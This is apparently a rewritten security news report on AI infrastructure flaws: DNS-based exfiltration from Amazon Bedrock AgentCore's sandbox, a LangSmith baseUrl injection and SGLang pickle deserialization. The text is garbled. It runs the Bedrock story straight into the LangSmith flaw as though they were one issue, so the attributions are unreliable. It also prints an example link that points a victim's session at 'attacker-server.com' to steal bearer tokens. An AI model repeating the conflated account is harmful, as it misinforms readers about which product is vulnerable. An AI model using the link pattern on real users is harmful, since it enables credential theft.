Researchers in cybersecurity have revealed a new way to steal private information from artificial intelligence (AI) code execution environments by using domain name system (DNS) queries. BeyondTrust said in a report published on Monday that the sandbox mode of the Amazon Bedrock AgentCore Code Interpreter lets DNS queries go out, which an attacker can use to open interactive shells and get around network isolation. The problem doesn't have a CVE number, but it does have a CVSS score of 7.5 out of 10.0.

Amazon Bedrock AgentCore Code Interpreter is a fully managed service that lets AI agents run code safely in isolated sandbox environments, so that agentic workloads can't get to other systems. Amazon started it in August 2025.

The flaw has been described as a case of URL parameter injection caused by not checking the baseUrl parameter. This lets an attacker steal a signed-in user's bearer token, user ID, and workspace ID by sending them to a server they control through social engineering methods like tricking the victim into clicking on a link that looks like this: Cloud - smith.langchain[. ]com/studio/?baseUrl=https://attacker-server.com Self-hosted - /studio/?baseUrl=https://attacker-server.com If an attacker successfully takes advantage of the vulnerability, they could get unauthorized access to the AI's trace history.

They could also see internal SQL queries, CRM customer records, or proprietary source code by looking at tool calls.

Liad Eliyahu and Eliana Vuijsje, researchers at Miggo, said, "A LangSmith user who is logged in could be hacked just by going to a site controlled by an attacker or clicking on a bad link." "This flaw shows that AI observability platforms are now a key part of infrastructure. These tools often skip security guardrails by accident because they put developer flexibility first.

This risk is even higher because AI Agents, like "traditional" software, have full access to internal data sources and third-party services. ## Unsafe Pickle Deserialization Flaws in SGLang Security vulnerabilities have also been found in SGLang, a popular open-source framework for serving large language models and multimodal AI models. If these flaws are successfully exploited, they could lead to unsafe pickle deserialization, which could allow remote code execution.